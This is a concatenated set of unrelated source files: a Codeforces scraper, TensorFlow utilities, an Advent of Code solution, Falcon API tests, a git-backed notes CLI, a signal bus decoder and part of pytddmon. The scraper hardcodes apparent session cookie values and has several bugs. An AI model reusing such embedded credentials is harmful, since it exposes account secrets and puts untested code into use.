from bs4 import BeautifulSoup
import html2text
import time
import argparse
import concurrent.futures
def sub_strip(matchobj):
return matchobj.group(0).replace(u"\u2009", "")
def get_problem_list(url):
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
soup = BeautifulSoup(html_content, "html.parser") # making soap
messages = []
text = soup.select("body a")
for row in text:
message = ""
raw = str(row)
body = re.search(' href="/problemset/problem/(.*)">', raw)
if body != None:
w = body.group(1)
message = str(w)
c = message.split('/')
#if message != 'easy' and message != 'medium' and message != 'hard' and message != 'challenge' and message != 'extcontest' and message != 'school':
#messages.append(message)
messages.append(c)
return messages
def get_solution_ids(name, language):
'''IF IT'S BEEN A LONG TIME SINCE THE LAST TIME YOU USED THIS CODE, YOU NEED TO LOG IN AGAIN AND SEE WHAT CURRENT JSESSIONID AND 39ce7 ARE'''
d = {'JSESSIONID': 'FBAAF89D197D7A5C7E95C536A7D31A7A-n1', '39ce7': 'CFtRZMGC'}
#d = {'JSESSIONID': '<KEY>', '39ce7': 'CFh6GVF2'}
#JSESSIONID=77C3B36AE19BC9CE0B75529825DDB926-n1; 39ce7=CFh6GVF2
url = 'http://codeforces.com/problemset/status/' + name[0] + '/problem/' + name[1]
c = requests.get(url, cookies = d)
m = re.search('meta name="X-Csrf-Token" content="(.*)"', c.text)
if not m:
raise 'unable to get csrf token'
csrf_token = m.groups(1)
if language == 'python':
#c = requests.post("http://codeforces.com/problemset/status/1/problem/A",
c = requests.post(url,
data = {'csrf_token':csrf_token, 'action':'setupSubmissionFilter', 'frameProblemIndex':'A', 'verdictName':'OK', 'programTypeForInvoker':'python.2', 'comparisonType':'NOT_USED', 'judgedTestCount':'', '_tta':'199'},
headers = {'X-Csrf-Token':csrf_token},
cookies = d
)
elif language == 'c++':
#c = requests.post("http://codeforces.com/problemset/status/1/problem/A",
c = requests.post(url,
data = {'csrf_token':csrf_token, 'action':'setupSubmissionFilter', 'frameProblemIndex':'A', 'verdictName':'OK', 'programTypeForInvoker':'cpp.g++', 'comparisonType':'NOT_USED', 'judgedTestCount':'', '_tta':'199'},
headers = {'X-Csrf-Token':csrf_token},
cookies = d
)
else:
pass
page = requests.get(url, cookies = d)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
soup = BeautifulSoup(html_content, "html.parser") # making soap
messages = []
text = soup.select("body a")
for row in text:
message = ""
raw = str(row)
body = re.search('submissionid="(.*)" t', raw)
if body != None:
w = body.group(1)
message = str(w)
messages.append(message)
return messages
def get_description(i):
descriptions = []
left_out = []
failed_to_download_d = []
url = 'http://codeforces.com/problemset/problem/' + str(i[0]) + '/' + str(i[1])
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
if re.search('"message":"requests limit exhausted"', html_content) != None:
while re.search('message":"requests limit exhausted', html_content) != None:
time.sleep(1)
page = requests.get(url)
html_content = page.text
if html_content==None:
failed_to_download_d.append(i)
if re.search('src="http://codeforces.com/predownloaded', html_content.replace("\\", "")) == None and re.search('src="http://espresso.codeforces.com', html_content.replace("\\", "")) == None and re.search('"message":"Problem is not visible now. Please try again later."', html_content) == None and re.search('Statement is not available', html_content) == None:
body = re.findall('</div></div><div>(.+?)<script type="text/javascript">', html_content, flags=re.S)
w = body[0]
w = w.replace('class="upper-index">', 'class="upper-index">^')
'''NEED TO PUT PUT CODE HERE TO REMOVE SPACES IN NEGATIVE EXPONENTS'''
w = re.sub('class="upper-index">(.+?)</sup>', sub_strip, w, re.S)
w = w.replace("</p>", "\n</p>")
w = w.replace("<br", "\n<br")
w = w.replace("</div>", "\n</div>")
w = w.replace("</center>", "\n</center>")
w = BeautifulSoup(w, "html.parser").get_text()
w = w.replace("All submissions for this problem are available.", "")
w = re.sub('Read problems statements in (.+?)\\\\n', '', w, re.M)
w = re.sub('Subtasks(.+?)Example', 'Example', w, re.S)
w = w.replace("\u003C","<")
w = w.replace("\u003E",">")
w = w.replace("\n\n\n\n\n\n","\n\n\n")
w = w.replace("\n\n\n\n","\n\n\n")
w = w.replace("\\","\\\\")
descriptions.append(w.encode('utf-8').decode('string-escape'))
else:
left_out.append(i)
return descriptions, left_out, failed_to_download_d
def get_solutions(contest, solution_ids):
solutions = {}
#failed_to_download_s = []
with concurrent.futures.ProcessPoolExecutor(max_workers=50) as executor:
future_to_url = {executor.submit(get_solution, contest, i): i for i in solution_ids}
for future in concurrent.futures.as_completed(future_to_url):
data = future.result()
if data[2] == None:
solutions[data[0]] = data[1]
return solutions
def get_solution(contest, solution_id):
url = 'http://codeforces.com/contest/' + str(contest[0]) + '/submission/' + str(solution_id)
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
soup = BeautifulSoup(html_content, "html.parser")
text = soup.select("body > div > div > div > div > pre")
failed_to_download = None
solution = None
if len(text)==0:
failed_to_download = solution_id
else:
body = BeautifulSoup(str(text[0]), "html.parser").get_text()
body = body.replace("\\","\\\\")
solution = body.encode('utf-8').decode('string-escape')
return solution_id, solution, failed_to_download
def download_all_challenge_names(filename):
target = open(filename, 'w')
problem_list = []
for i in range(0,30):
a = 'http://codeforces.com/problemset/page/' + str(i+1)
l = get_problem_list(a)
for jdx, j in enumerate(l):
if jdx % 2 == 0:
problem_list.append(j)
target.write(str(problems))
def download_descriptions_solutions(filename, index_n):
root_dir = 'codeforces_data'
file = open(filename, 'r')
f = open(filename, 'r')
index_n_int = int(index_n)
start = index_n_int + (600*index_n_int)
end = start + 599
all_names = []
for line in f:
raw = eval(str(line))
a = ""
b = ""
all_names = raw
language = ["python", "c++"]
for idx, i in enumerate(all_names):
descriptions, left_out, failed_to_download_d = get_description(i)
if i not in left_out:
if not os.path.exists(root_dir):
os.makedirs(root_dir)
save_dir = root_dir + "/" + i[0] + "_" + i[1]
#'''
if not os.path.exists(save_dir):
os.makedirs(save_dir)
description_dir = save_dir + "/description"
if not os.path.exists(description_dir):
os.makedirs(description_dir)
description_file_path = description_dir + "/description.txt"
description_file = open(description_file_path, 'w')
description_file.write(descriptions[0])
ids_l = []
for l in language:
ids = get_solution_ids(i, l)
ids_l.append(ids)
solutions = get_solutions(i, ids)
solution_dir = save_dir + "/solutions_" + l
if not os.path.exists(solution_dir):
os.makedirs(solution_dir)
for jdx, j in enumerate(solutions):
if len(solutions[j]) < 10000:
solution_file_path = solution_dir + "/" + j + ".txt"
solution_file = open(solution_file_path, 'w')
solution_file.write(solutions[j])
if len(ids_l[0]) == 0 and len(ids_l[1]) == 0:
shutil.rmtree(save_dir)
print("Finished download process")
if len(failed_to_download) > 0:
print("Following challenges failed to download: " + str(failed_to_download))
parser = argparse.ArgumentParser()
parser.add_argument('--index', type=str, default="1", help='')
args = parser.parse_args()
index_n = args.index
'''
download_all_challenge_names('challenges_all.txt')
#'''
#'''
download_descriptions_solutions('challenges_all.txt', index_n)
#'''
```
#### File: 0bserver07/neural-engineers-first-attempt/utils.py
```python
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.ops import nn_ops, math_ops
def get_seq_length(sequence):
used = tf.sign(tf.reduce_max(tf.abs(sequence), reduction_indices=2))
length = tf.reduce_sum(used, reduction_indices=1)
length = tf.cast(length, tf.int32)
return length
def get_target_length(sequence):
used = tf.sign(sequence)
length = tf.reduce_sum(tf.to_float(used), reduction_indices=1)
return length
'''alrojo'''
def sequence_loss_tensor(logits, targets, weights, num_classes,
average_across_timesteps=True,
softmax_loss_function=None, name=None):
"""Weighted cross-entropy loss for a sequence of logits (per example).
faster? ; 3D tensor logit input; flattens and then multiples in one op; so no for loop
"""
with ops.name_scope(name, "sequence_loss_by_example", [logits, targets, weights]):
probs_flat = tf.reshape(logits, [-1, num_classes])
targets = tf.reshape(targets, [-1])
if softmax_loss_function is None:
crossent = nn_ops.sparse_softmax_cross_entropy_with_logits(
probs_flat, targets)
else:
crossent = softmax_loss_function(probs_flat, targets)
crossent = crossent * tf.reshape(weights, [-1])
crossent = tf.reduce_sum(crossent)
total_size = math_ops.reduce_sum(weights)
total_size += 1e-12 # to avoid division by zero
crossent /= total_size
return crossent
def _add_gradient_noise(t, stddev=1e-3, name=None):
"""Adds gradient noise as described in http://arxiv.org/abs/1511.06807
The input Tensor `t` should be a gradient.
The output will be `t` + gaussian noise.
0.001 was said to be a good fixed value for memory networks."""
with tf.op_scope([t, stddev], name, "add_gradient_noise") as name:
t = tf.convert_to_tensor(t, name="t")
gn = tf.random_normal(tf.shape(t), stddev=stddev)
return tf.add(t, gn, name=name)
# from https://github.com/domluna/memn2n
def _position_encoding(sentence_size, embedding_size):
"""Position encoding described in section 4.1 in "End to End Memory Networks" (http://arxiv.org/pdf/1503.08895v5.pdf)"""
encoding = np.ones((embedding_size, sentence_size), dtype=np.float32)
ls = sentence_size + 1
le = embedding_size + 1
for i in range(1, le):
for j in range(1, ls):
encoding[i - 1, j - 1] = (i - (le - 1) / 2) * (j - (ls - 1) / 2)
encoding = 1 + 4 * encoding / embedding_size / sentence_size
return np.transpose(encoding)
# TODO fix positional encoding so that it varies according to sentence lengths
def _xavier_weight_init():
"""Xavier initializer for all variables except embeddings as desribed in [1]"""
def _xavier_initializer(shape, **kwargs):
eps = np.sqrt(6) / np.sqrt(np.sum(shape))
out = tf.random_uniform(shape, minval=-eps, maxval=eps)
return out
return _xavier_initializer
# from https://danijar.com/variable-sequence-lengths-in-tensorflow/
# used only for custom attention GRU as TF handles this with the sequence length param for normal RNNs
def _last_relevant(output, length):
"""Finds the output at the end of each input"""
batch_size = int(output.get_shape()[0])
max_length = int(output.get_shape()[1])
out_size = int(output.get_shape()[2])
index = tf.range(0, batch_size) * max_length + (length - 1)
flat = tf.reshape(output, [-1, out_size])
relevant = tf.gather(flat, index)
return relevant
# from therne_utils
def _get_dims(shape):
fan_in = shape[0] if len(shape) == 2 else np.prod(shape[:-1])
fan_out = shape[1] if len(shape) == 2 else shape[-1]
return fan_in, fan_out
# from therne_utils
def batch_norm(x, is_training):
""" Batch normalization.
:param x: Tensor
:param is_training: boolean tf.Variable, true indicates training phase
:return: batch-normalized tensor
"""
with tf.variable_scope('BatchNorm'):
# calculate dimensions (from tf.contrib.layers.batch_norm)
inputs_shape = x.get_shape()
axis = list(range(len(inputs_shape) - 1))
param_shape = inputs_shape[-1:]
beta = tf.get_variable('beta', param_shape, initializer=tf.constant_initializer(0.))
gamma = tf.get_variable('gamma', param_shape, initializer=tf.constant_initializer(1.))
batch_mean, batch_var = tf.nn.moments(x, axis)
ema = tf.train.ExponentialMovingAverage(decay=0.5)
def mean_var_with_update():
ema_apply_op = ema.apply([batch_mean, batch_var])
with tf.control_dependencies([ema_apply_op]):
return tf.identity(batch_mean), tf.identity(batch_var)
mean, var = tf.cond(is_training,
mean_var_with_update,
lambda: (ema.average(batch_mean), ema.average(batch_var)))
normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3)
return normed
``` |
{
"source": "0Bu/advent-of-code-2018",
"score": 3
} |
#### File: 0Bu/advent-of-code-2018/day03.py
```python
import re
def get_overlapping_claims(rectangles):
coordinates = {}
for r in rectangles:
index, x, y, width, height = [int(a) for a in re.findall(r'\d+', r)]
for y_ in range(y, y + height):
for x_ in range(x, x + width):
if (x_, y_) in coordinates:
coordinates[(x_, y_)] += 1
else:
coordinates[(x_, y_)] = 1
return sum(v > 1 for v in coordinates.values())
def get_nonoverlapping_claim_ids(rectangles):
coordinates = dict()
ids = set()
for r in rectangles:
index, x, y, width, height = [int(a) for a in re.findall(r'\d+', r)]
ids.add(index)
for y_ in range(y, y + height):
for x_ in range(x, x + width):
coordinates.setdefault((x_, y_), set()).add(index)
for c in coordinates.values():
if len(c) > 1:
ids -= c
return ids
if __name__ == "__main__":
lines = [line.strip() for line in open("day03.txt", "r")]
print('overlapped claims:', get_overlapping_claims(lines[:]))
print('nonoverlapping claim ids:', get_nonoverlapping_claim_ids(lines[:]))
```
#### File: advent-of-code-2018/test/test_day01.py
```python
import unittest
import day01
class Part1(unittest.TestCase):
def test_get_frequency(self):
self.assertEqual(day01.get_frequency([+1, +1, +1]), 3)
self.assertEqual(day01.get_frequency([+1, +1, -2]), 0)
self.assertEqual(day01.get_frequency([-1, -2, -3]), -6)
class Part2(unittest.TestCase):
def test_get_dejavu(self):
self.assertEqual(day01.get_dejavu([+1, -1]), 0)
self.assertEqual(day01.get_dejavu([+3, +3, +4, -2, -4]), 10)
self.assertEqual(day01.get_dejavu([-6, +3, +8, +5, -6]), 5)
self.assertEqual(day01.get_dejavu([+7, +7, -2, -7, -4]), 14)
``` |
{
"source": "0c370t/land_acknowledgement",
"score": 3
} |
#### File: src/tests/test_api.py
```python
from unittest.mock import patch
import pytest
from falcon import testing
from app.web import create_app
from xml.dom import minidom
def get_message_from_xml(xml_string):
'''Just a little help to deal with twilio's xml format'''
xmldoc = minidom.parseString(xml_string)
itemlist = xmldoc.getElementsByTagName('Message')
return itemlist[0].firstChild.data
@pytest.fixture()
def client():
return testing.TestClient(create_app())
@patch('app.web.GeoData.query_location')
def test_unknown_location(query_location, client):
'''It should respond with help text when location can't be found'''
query_location.return_value = None
result = client.simulate_post('/', params={'Body': "Sometown, ak"})
assert get_message_from_xml(result.text) == 'I could not find the location: Sometown, ak'
@patch('app.web.GeoData.query_location')
@patch('app.web.GeoData.native_land_from_point')
def test_unfound_acknowledgement(from_point, query_location, client):
'''It should respond with help text when there's no native land for a point'''
query_location.return_value = {'city': 'Paris', 'state': 'France', 'latitude': 45.928, 'longitude': -67.56}
from_point.return_value = []
result = client.simulate_post('/', params={'Body': "Paris, France"})
assert get_message_from_xml(result.text) == 'Sorry, I could not find anything about Paris, France.'
@patch('app.web.GeoData.query_location')
@patch('app.web.GeoData.native_land_from_point')
def test_single_result(from_point, query_location, client):
'''It should respond with a single result when there's only one'''
query_location.return_value = {'city': 'Adacao', 'state': 'Guam', 'latitude': 45.928, 'longitude': -67.56}
from_point.return_value = [{'name': 'Chamorro'}]
result = client.simulate_post('/', params={'Body': "Adacao, gu"})
assert get_message_from_xml(result.text) == 'In Adacao, Guam you are on Chamorro land.'
@patch('app.web.GeoData.query_location')
@patch('app.web.GeoData.native_land_from_point')
def test_two_results(from_point, query_location, client):
'''It should respond with a two results when there's two results'''
query_location.return_value = {'city': 'Portland', 'state': 'Oregon', 'latitude': 45.928, 'longitude': -67.56}
from_point.return_value = [{'name': 'Cowlitz'}, {'name': 'Clackamas'}]
result = client.simulate_post('/', params={'Body': "Portland, or"})
assert get_message_from_xml(result.text) == 'In Portland, Oregon you are on Cowlitz and Clackamas land.'
@patch('app.web.GeoData.query_location')
@patch('app.web.GeoData.native_land_from_point')
def test_multiple_results(from_point, query_location, client):
'''It prefers the Oxford comma'''
query_location.return_value = {'city': 'Seattle', 'state': 'Washington', 'latitude': 45.928, 'longitude': -67.56}
from_point.return_value = [{'name': 'Duwamish'}, {'name': 'Coast Salish'}, {'name': 'Suquamish'}]
result = client.simulate_post('/', params={'Body': "Seattle, wa"})
assert get_message_from_xml(result.text) == 'In Seattle, Washington you are on Duwamish, Coast Salish, and Suquamish land.' # noqa E501
``` |
{
"source": "0c4t/zetta",
"score": 3
} |
#### File: zetta/zetta/zetta.py
```python
import os
import sys
import datetime
import argparse
import shutil
from subprocess import call
from git import Repo
from git import GitCommandError
from git import InvalidGitRepositoryError
def parse_args():
parser = argparse.ArgumentParser(
description="A Tool for managing a \"box of notes\"")
subparsers = parser.add_subparsers(dest="action")
search_parser = subparsers.add_parser("search",
help="search through notes")
search_parser.add_argument("pattern", type=str,
help="pattern to search in notes for")
edit_parser = subparsers.add_parser("edit",
help="edit note by id")
edit_parser.add_argument("id",
help="note id")
create_parser = subparsers.add_parser("create",
help="create new note")
create_parser.add_argument("-t", "--title", type=str,
default="# ", dest="title", help="desired title")
delete_parser = subparsers.add_parser("delete",
help="delete note by id")
delete_parser.add_argument("id",
help="note id")
return parser.parse_args()
def main():
args = parse_args()
try:
global PATH_TO_REPO
PATH_TO_REPO = os.environ["ZETTA_BOX"]
except KeyError as e:
sys.stderr.write("Error: please set ZETTA_BOX environment variable\nto path to git repo to store notes in!\n\n")
return -1
if not (os.path.exists(PATH_TO_REPO) and os.path.isdir(PATH_TO_REPO)):
sys.stderr.write("Error: path to repo is invalid!\n\n")
return -1
global REPO
try:
REPO = Repo(PATH_TO_REPO)
except InvalidGitRepositoryError as e:
sys.stderr.write("Error: path in ZETTA_BOX is a valid path to dir, but there isn't a git repo in it\n\n")
return -1
actions = {
"search": search,
"edit": edit,
"create": create,
"delete": delete
}
if args.action in actions.keys():
action = actions[args.action]
if callable(action):
action(args)
def search(args):
pattern_lower = args.pattern.lower()
notes = os.listdir(PATH_TO_REPO)[1:]
for note_name in notes:
path = f'{PATH_TO_REPO}{note_name}'
path_to_note_file = f"{path}/README.md"
with open(path_to_note_file, 'r') as note_file:
title = note_file.readline()
if "\n" in title:
title = title[:-1]
if "#" in title:
title = title[1:]
title = title.strip()
note_file.seek(0)
while True:
line = note_file.readline()
line = line.lower()
if not line:
break
if pattern_lower in line:
print(note_name + ": " + title)
break
def edit(args):
note_name = args.id
if not note_name.isnumeric():
sys.stderr.write("\nError: note id should be numeric\n\n")
return -1
editor = os.environ.get("EDITOR") if os.environ.get("EDITOR") else "vi"
path = f'{PATH_TO_REPO}{os.path.sep}{note_name}'
path_to_note_file = f"{path}/README.md"
call([editor, path_to_note_file])
with open(path_to_note_file, "r") as note_file:
commit_message = note_name + ": " + note_file.readline()
commit = input("commit? (y/n): ")
while (commit != "y") and (commit != "n"):
commit = input("enter either \"y\" or \"n\": ")\
if (commit == "y"):
git = REPO.git
git.add(path_to_note_file)
try:
git.commit(m=commit_message)
except GitCommandError as e:
print("Nothing to commit :(\n")
def create(args):
title = str(args.title)
editor = os.environ.get("EDITOR") if os.environ.get("EDITOR") else "vi"
note_name = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
path = f'{PATH_TO_REPO}{os.path.sep}{note_name}'
os.mkdir(path)
path_to_note_file = f"{path}/README.md"
with open(path_to_note_file, "w") as note_file:
note_file.write(title)
note_file.flush()
call([editor, path_to_note_file])
note_file = open(path_to_note_file, "r")
commit_message = note_name + ": " + note_file.readline()
print(note_name)
commit = input("commit? (y/n): ")
while (commit != "y") and (commit != "n"):
commit = input("enter either \"y\" or \"n\": ")\
if (commit == "y"):
git = REPO.git
git.add(path_to_note_file)
git.commit(m=commit_message)
def delete(args):
note_name = args.id
path = f'{PATH_TO_REPO}{os.path.sep}{note_name}'
path_to_note_file = f"{path}/README.md"
try:
with open(path_to_note_file, "r") as note_file:
note_title = note_file.readline()
except FileNotFoundError as e:
sys.stderr.write("\nError: note with given name does not exist :(\n\n")
return
do_deletion = input(f"{note_name}: {note_title}\ndelete? (y/n): ")
if (do_deletion != "y"):
print("deletion canceled!")
return
shutil.rmtree(path)
commit_message = "deleted " + note_name
print(f"deleted {note_name} ({note_title})")
commit = input("commit? (y/n): ")
while (commit != "y") and (commit != "n"):
commit = input("enter either \"y\" or \"n\": ")\
if (commit == "y"):
try:
git = REPO.git
git.add(path_to_note_file)
git.commit(m=commit_message)
except GitCommandError as e:
sys.stderr.write("\nWarning: could not commit note deletion (was not committed on creation?)\n\n")
if __name__ == "__main__":
exit(main())
``` |
{
"source": "0caliber/tds3012b",
"score": 2
} |
#### File: 0caliber/tds3012b/BusDecode.py
```python
import unittest
###############################################################################################
# Main Bus Class Decode Functions
###############################################################################################
class BusDecode:
def __init__(self):
print('Bus Decode')
self.LevelLo = 0.7
self.LevelHi = 2.7
self.EdgeDuration = 0 # used to determine sample scale for edge detection
self.PulseDurationLo = 0
self.PulseDurationHi = 0
self.bitlen = 1
# Comm defaults
def f_Threshold(self, rawdata):
dataout = []
for mydata in rawdata:
if mydata >= self.LevelHi:
mydigit = 1
elif mydata <= self.LevelLo:
mydigit = 0
else:
mydigit = 2
dataout.append(mydigit)
return dataout
pass
def f_FindClkDuration(self, thrdata):
low = 0
hi = 0
lowmax = 0
himax = 0
state = 0
for mydata in thrdata:
if mydata == 0:
low += 1
lowmax = max(lowmax, low)
elif mydata == 1:
hi += 1
himax = max(himax, hi)
if state == 0:
if mydata == 1:
low = 0
state = 1
elif state == 1:
if mydata == 0:
hi = 0
state = 0
self.PulseDurationLo = lowmax
self.PulseDurationHi = himax
pass
def f_FindEdges(self, thrdata):
state = 0
cnt = 0
dataout = []
newdigit = 0
mydigit = 0
for mydata in thrdata:
if state == 0:
if mydata == 1:
mydigit = 1
state = 1
elif mydata == 0:
mydigit = 0
state = 0
else: # mydata == 2:
state = 2
mydigit = 0
newdigit = 1
elif state == 1:
if mydata == 1:
mydigit = 0
state = 1
elif mydata == 0:
mydigit = -1
state = 0
else: # mydata == 2:
state = 2
mydigit = 0
newdigit = -1
else:
if mydata == 1:
mydigit = newdigit
state = 1
cnt = 0
elif mydata == 0:
mydigit = newdigit
state = 0
cnt = 0
else:
mydigit = 0
pass
dataout.append(mydigit)
return dataout
pass
def f_DecodeData(self, rawdata):
pass
def f_SetThresholdHi(self, LevelHi):
self.LevelHi = LevelHi
pass
def f_SetThresholdLo(self, LevelLo):
self.LevelLo = LevelLo
pass
def f_SetThresholdType(self, std_type):
try:
(self.LevelLo, self.LevelHi) = {
"CMOS" : (1.5, 3.5),
"LVCMOS" : (1, 2.3),
"TTL" : (0.7, 2.4),
"LVTTL" : (0.3, 2),
"RS422U" : (1.7, 2.5)
}[std_type]
except:
print ('Unknown standard, ', std_type)
def f_SetEdgeTimeSamples(self, edgesamples):
self.EdgeDuration = edgesamples
###############################################################################################
# TDD Unit Test Class and functions
###############################################################################################
class test_basic(unittest.TestCase):
# Test Attribute control
def test_ThesholdTypeCMOSHi(self):
x=BusDecode()
x.f_SetThresholdType('CMOS')
self.assertEqual(3.5, x.LevelHi)
def test_ThesholdTypeCMOSLo(self):
x=BusDecode()
x.f_SetThresholdType('CMOS')
self.assertEqual(1.5, x.LevelLo)
def test_ThesholdTypeLVCMOSHi(self):
x=BusDecode()
x.f_SetThresholdType('LVCMOS')
self.assertEqual(2.3, x.LevelHi)
def test_ThesholdTypeLVCMOSLo(self):
x=BusDecode()
x.f_SetThresholdType('LVCMOS')
self.assertEqual(1, x.LevelLo)
def test_ThesholdTypeTTLHi(self):
x=BusDecode()
x.f_SetThresholdType('TTL')
self.assertEqual(2.4, x.LevelHi)
def test_ThesholdTypeTTLLo(self):
x=BusDecode()
x.f_SetThresholdType('TTL')
self.assertEqual(0.7, x.LevelLo)
def test_ThesholdTypeLVTTLHi(self):
x=BusDecode()
x.f_SetThresholdType('LVTTL')
self.assertEqual(2, x.LevelHi)
def test_ThesholdTypeLVTTLLo(self):
x=BusDecode()
x.f_SetThresholdType('LVTTL')
self.assertEqual(0.3, x.LevelLo)
def test_SetThresholdHi(self):
x=BusDecode()
x.f_SetThresholdHi(1.2)
self.assertEqual(1.2, x.LevelHi)
def test_SetThresholdLo(self):
x=BusDecode()
x.f_SetThresholdLo(1)
self.assertEqual(1, x.LevelLo)
def test_SetEdgeTimeSamples(self):
x=BusDecode()
x.f_SetEdgeTimeSamples(1)
self.assertEqual(1, x.EdgeDuration)
# Test Threshold to Logic Function of RAW data
def test_ThresholdLVCMOS(self):
datain = [0.2, 0.2, 0.3, 0.7, 0.9, 1.0, 1.2, 1.3, 1.7, 1.9, 2.2, 2.7, 2.8, 2.8, 2.8 ]
x=BusDecode()
x.f_SetThresholdType('LVCMOS')
dataout = x.f_Threshold(datain)
dataref = [0, 0, 0, 0, 0, 0, 2, 2, 2, 2, 2, 1, 1, 1, 1 ]
self.assertEqual(dataref, dataout)
def test_ThresholdLVTTL(self):
datain = [0.2, 0.2, 0.3, 0.7, 0.9, 1.0, 1.2, 1.3, 1.7, 1.9, 2.2, 2.7, 2.8, 2.8, 2.8 ]
x=BusDecode()
x.f_SetThresholdType('LVTTL')
dataout = x.f_Threshold(datain)
dataref = [0, 0, 0, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1 ]
self.assertEqual(dataref, dataout)
# Test Clock Frequency determination
def test_FindClockFreq(self):
datain = [0.2, 2.4, 0.2, 2.4, 0.2, 1.5, 2.4, 2.4, 1.5, 0.2, 0.2, 1.7, 2.4, 1.2, 0.2, 2.4, 0.2, 2.4, 0.2]
x=BusDecode()
x.f_SetThresholdType('LVTTL')
dataout = x.f_Threshold(datain)
x.f_FindClkDuration(dataout)
self.assertEqual(2, x.PulseDurationLo)
self.assertEqual(2, x.PulseDurationHi)
# Test Digital Word Determination
def test_FindEdges(self):
datain = [0.2, 2.4, 0.2, 2.4, 0.2, 1.5, 2.4, 2.4, 1.5, 0.2, 0.2, 1.7, 2.4, 1.2, 0.2, 2.4, 0.2, 2.4, 0.2]
x=BusDecode()
x.f_SetThresholdType('LVTTL')
x.f_SetEdgeTimeSamples(0)
dataout = x.f_Threshold(datain)
digital = x.f_FindEdges(dataout)
digitalref = [0, 1, -1, 1, -1, 0, 1, 0, 0, -1, 0, 0, 1, 0, -1, 1,-1, 1, -1 ]
self.assertEqual(digitalref, digital)
```
#### File: 0caliber/tds3012b/pytddmon.py
```python
import os
import sys
import tempfile
import atexit
import shlex
import platform
import optparse
import re
from time import gmtime, strftime
from subprocess import Popen, PIPE, STDOUT
ON_PYTHON3 = sys.version_info[0] == 3
ON_WINDOWS = platform.system() == "Windows"
if not ON_PYTHON3:
import Tkinter as tk
else:
import tkinter as tk
# Constants
TEMP_FILE_DIR_NAME = tempfile.mkdtemp()
RUN_TESTS_SCRIPT_FILE = os.path.join(TEMP_FILE_DIR_NAME, 'pytddmon_tmp.py')
TEMP_OUT_FILE_NAME = os.path.join(TEMP_FILE_DIR_NAME, "out")
# If pytddmon is run in test mode, it will:
# 1. display the GUI for a very short time
# 2. write a log file, containing the information displayed
# (most notably green/total)
# 3. exit
TEST_MODE_FLAG = '--log-and-exit'
TEST_MODE_LOG_FILE = 'pytddmon.log'
TEST_FILE_REGEXP = "test_.*\\.py"
PYTHON_FILE_REGEXP = ".*\\.py"
def re_complete_match(regexp, string_to_match):
"""Helper function that does a regexp check if the full string_to_match
matches the regexp"""
return bool(re.match(regexp+"$", string_to_match))
# End of Constants
def file_name_to_module(base_path, file_name):
r"""Converts filenames of files in packages to import friendly dot separated
paths.
Examples:
>>> print(file_name_to_module("","pytddmon.pyw"))
pytddmon
>>> print(file_name_to_module("","pytddmon.py"))
pytddmon
>>> print(file_name_to_module("","tests/pytddmon.py"))
tests.pytddmon
>>> print(file_name_to_module("","./tests/pytddmon.py"))
tests.pytddmon
>>> print(file_name_to_module("",".\\tests\\pytddmon.py"))
tests.pytddmon
>>> print(file_name_to_module("/User/pytddmon\\ geek/pytddmon/","/User/pytddmon\\ geek/pytddmon/tests/pytddmon.py"))
tests.pytddmon
"""
symbol_stripped = os.path.relpath(file_name, base_path)
for symbol in r"/\.":
symbol_stripped = symbol_stripped.replace(symbol, " ")
words = symbol_stripped.split()
module_words = words[:-1] # remove .py/.pyw
module_name = '.'.join(module_words)
return module_name
def build_run_script(files):
"""Compiles a script to run all tests in the files.
>>> print(build_run_script(["pytddmon.py"]))
import sys
import unittest
import doctest
...
import pytddmon
suite.addTests(load_module_tests(pytddmon))
try:
suite.addTests(doctest.DocTestSuite(pytddmon, optionflags=doctest.ELLIPSIS))
except:pass
...
"""
content = []
content.append("import sys")
content.append("import unittest")
content.append("import doctest")
content.append("")
content.append("sys.path[0] = %r" % os.getcwd())
content.append("suite = unittest.TestSuite()")
content.append(
"load_module_tests = unittest.defaultTestLoader.loadTestsFromModule"
)
content.append("")
for filename in files:
module = file_name_to_module("", filename)
content.append('import ' + module)
content.append('suite.addTests(load_module_tests(' + module + '))')
content.append('try:')
content.append(
' suite.addTests(doctest.DocTestSuite(' +
module +
', optionflags=doctest.ELLIPSIS))'
)
content.append('except:pass')
content.append('')
content.append("if __name__ == '__main__':")
content.append(" out = open(%r, 'w')" % TEMP_OUT_FILE_NAME)
content.append(" unittest.TextTestRunner(stream=out).run(suite)")
return "\n".join(content)
def calculate_checksum(filelist, fileinfo):
"""Generates a checksum for all the files in the file list."""
val = 0
for filename in filelist:
val += (
fileinfo.get_modified_time(filename) +
fileinfo.get_size(filename) +
fileinfo.get_name_hash(filename)
)
return val
class ColorPicker:
"""
ColorPicker decides the background color the pytddmon window,
based on the number of green tests, and the total number of
tests. Also, there is a "pulse" (light color, dark color),
to increase the feeling of continous testing.
"""
def __init__(self):
self.color = 'green'
self.light = True
def pick(self):
"returns the tuple (light, color) with the types(bool ,str)"
return (self.light, self.color)
def pulse(self):
"updates the light state"
self.light = not self.light
def reset_pulse(self):
"resets the light state"
self.light = True
def set_result(self, green, total):
"calculates what color should be used and may reset the lightness"
old_color = self.color
self.color = 'green'
if green == total-1:
self.color = 'red'
if green < total-1:
self.color = 'gray'
if self.color != old_color:
self.reset_pulse()
def win_text(total_tests, passing_tests=0):
"""
The text shown in the main window.
"""
return "%d/%d" % (passing_tests, total_tests)
class ScriptWriter:
"""
ScriptWriter: gets it's modules from the Finder, and
writes a test script using the file writer and script
builder.
"""
def __init__(self, finder, file_writer, script_builder):
self.finder = finder
self.file_writer = file_writer
self.script_builder = script_builder
def write_script(self):
"""
Finds the tests and Compiles the test runner script and writes it
to file. This is done with the help from the finder script builder and
file writer.
"""
modules = self.finder()
result = self.script_builder(modules)
self.file_writer(RUN_TESTS_SCRIPT_FILE, result)
class TestScriptRunner:
"""
TestScriptRunner has two collaborators:
cmdrunner, runs a specified command line, returns stderr as string
analyzer, analyses unittest-output into green,total number of tests
"""
